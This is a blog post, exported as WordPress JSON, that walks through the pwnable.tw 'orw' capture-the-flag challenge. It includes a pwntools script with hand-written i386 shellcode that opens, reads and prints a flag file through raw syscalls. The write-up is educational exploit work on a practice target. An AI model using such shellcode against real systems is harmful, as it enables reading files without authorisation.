{"id":54,"date":"2021-03-09T22:47:18","date_gmt":"2021-03-09T22:47:18","guid":{"rendered":"https:\/\/blog.bpcspace.com\/?p=54"},"modified":"2021-03-09T22:47:18","modified_gmt":"2021-03-09T22:47:18","slug":"orw","status":"publish","type":"post","link":"https:\/\/blog.bpcspace.com\/?p=54","title":{"rendered":"orw"},"content":{"rendered":"\n

This binary gives up it’s restraints in the description: <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

If we decompile the binary with ghidra, we can see it literally just accepts and calls our shellcode.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

To figure out how linux syscalls work in assembly, you can use this for reference. Just put the correct value in each register then call int 0x80<\/code>, and in this scenario the return value will be put in eax. To find what to put in each parameter, you can look at the man pages (ex man 3 read<\/code>). <\/p>\n\n\n\n

In the end, the exploit looks like this:<\/p>\n\n\n\n

#!\/usr\/bin\/env python3\nfrom pwn import *\ncontext.binary = '.\/orw'\nproc = connect('chall.pwnable.tw', 10001)\n\npayload = asm('''\n\npush 0x006761\npush 0x6c662f77\npush 0x726f2f65\npush 0x6d6f682f\n\nmov eax, 0x05\nmov ebx, esp\nmov ecx, 0\nmov edx, 0\nint 0x80\n\nmov ebx, eax\nmov eax, 0x03\nmov ecx, esp\nmov edx, 0xff\nint 0x80\n\nmov eax, 0x04\nmov ebx, 0x1\nmov ecx, esp\nmov edx, 0xff\nint 0x80\n''')\n\nproc.sendafter(\"shellcode:\", payload)\nprint(proc.read())<\/code><\/pre>\n\n\n\n
There’s a few things to note here. edx, which resembles the number of characters to read\/write in both syscalls, is set to a large number, because we’re aloud to overestimate. There will be some garbage printed on the terminal, but the flag will be printed first and is easy to pick out. Notice how when we push<\/code> the filename, it’s in little endian (reversed).<\/p>\n\n\n\n
After running the script, we get our flag:<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
It is possible to have a shorter exploit using pwnlib’s shellcraft module. I though it’d be better to do the assembly myself, as it reveals what’s going on with linux i386 syscalls.<\/p>\n","protected":false},"excerpt":{"rendered":"
This binary gives up it’s restraints in the description: If we decompile the binary with ghidra, we can see it literally just accepts and calls our shellcode. To figure out how linux syscalls work in assembly, you can use this for reference. Just put the correct value in each register then call int 0x80, and […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"templates\/template-full-width.php","format":"standard","meta":{"footnotes":""},"categories":[3,6],"tags":[],"class_list":["post-54","post","type-post","status-publish","format-standard","hentry","category-basic","category-pwnable-tw"],"_links":{"self":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=54"}],"version-history":[{"count":0,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts\/54\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}